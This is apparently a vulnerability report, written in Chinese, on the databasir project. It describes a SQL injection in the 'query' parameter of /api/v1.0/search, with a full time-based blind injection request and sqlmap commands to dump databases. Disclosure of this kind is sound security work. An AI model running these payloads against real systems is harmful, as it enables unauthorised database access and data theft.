databasir
databasir copied to clipboard
vran-dev
/api/v1.0/search?query= 存在SQL Injection漏洞
漏洞功能在UI此处:
漏洞出现源出现/api/v1.0/search , 在query参数未过滤恶意字符,最终完整的拼接在DocumentFullTextDao.java代码的157行代码,dslContext构建的时候将拿到完整的字符拼接进入,将执行完整的SQL语句:
利用过程,发送延迟数据包,使得系统延迟5s:
GET /api/v1.0/search?query=')))+AND+(SELECT+2859+FROM+(SELECT(SLEEP(5)))HraM)%23 HTTP/1.1
Host: 127.0.0.1:9080
sec-ch-ua-platform: "Linux"
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJEYXRhYmFzaXIiLCJleHAiOjE3NjQ1ODA2ODUsInVzZXJuYW1lIjoiTi9BIn0.OHS6FZ10ym6iXDcXnxvzaH5_DU0FOa_Q7sHb06h9A3k
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/plain, */*
sec-ch-ua: "Chromium";v="139", "Not;A=Brand";v="99"
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
sec-ch-ua-mobile: ?0
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9080/groups
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
5s后返回500
可以使用工具sqlmap加快sql注入利用过程,保存上述数据包为reqsql.txt,执行下面命令
sqlmap -r reqsql.txt --level=5
执行下面盲注入出数据库,同理也可以利用盲注SQL表达式完全控制数据库
sqlmap -r reqsql.txt --level=5 --dbs
